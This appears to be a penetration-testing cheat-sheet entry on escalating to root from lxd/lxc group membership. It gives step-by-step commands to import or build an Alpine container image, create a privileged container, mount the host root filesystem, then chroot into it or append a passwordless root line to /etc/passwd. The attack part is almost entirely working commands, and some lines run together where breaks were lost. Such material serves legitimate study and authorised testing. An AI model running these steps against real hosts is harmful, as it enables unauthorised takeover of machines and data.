Members of the lxd or lxc group can escalate privileges to root by abusing container functionality. Privileged containers (security.privileged=true) interact with the host filesystem as root, allowing full system access when the host root is mounted inside the container.
Before exploiting, check if container images already exist on the target system:
# Look for 'lxd' or 'lxc' in the output
id
# Quick check in root directory
ls / | grep -iE 'image|container|tar'
# Deep scan for compressed images
find / -iname '*.tar*' 2>/dev/nullLook for files like alpine.tar.gz, ubuntu-template.tar.xz, etc.
If you found an existing container image (e.g., ubuntu-template.tar.xz):
# Import the existing image
lxc image import [ubuntu-template.tar.xz] --alias ubuntutemp
# Verify import
lxc image list
# Create privileged container
lxc init ubuntutemp privesc -c security.privileged=true #if errors, use: lxd init
# Mount host filesystem
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# Start and access container
lxc start privesc
lxc exec privesc /bin/bash # or /bin/sh if bash unavailable
# Navigate to host root
cd /mnt/root/root && id
---
# Become real root on the host
chroot /mnt/root /bin/bash
# another way
echo 'root::0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd On your attacking machine, install distrobuilder:
sudo su
# Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clone and build distrobuilder
git clone https://github.com/lxc/distrobuilder
cd distrobuilder
make
# Prepare Alpine build directory
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Build the container image (if errored, check release version)
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18 Transfer files to target, then import on the target machine:
# Import image (must be done from user's HOME directory)
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
# Verify import
lxc image list
# Create privileged container
lxc init alpine privesc -c security.privileged=true #if errors, use: lxd init
# Mount host filesystem
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# Start and access
lxc start privesc
lxc exec privesc /bin/sh
cd /mnt/root # Host filesystem mounted hereUsing the automated Alpine builder:
# Build Alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
# Import (must be from HOME directory)
lxc image import ./alpine*.tar.gz --alias myimage
# Initialize LXD storage if needed
lxd init
# Create and configure container
lxc init myimage mycontainer -c security.privileged=true #if errors, use: lxd init
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# Start and access
lxc start mycontainer
lxc exec mycontainer /bin/shOnce inside the privileged container:
cd /mnt/root/root
id # Verify you're rootchroot /mnt/root /bin/bashecho 'root::0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd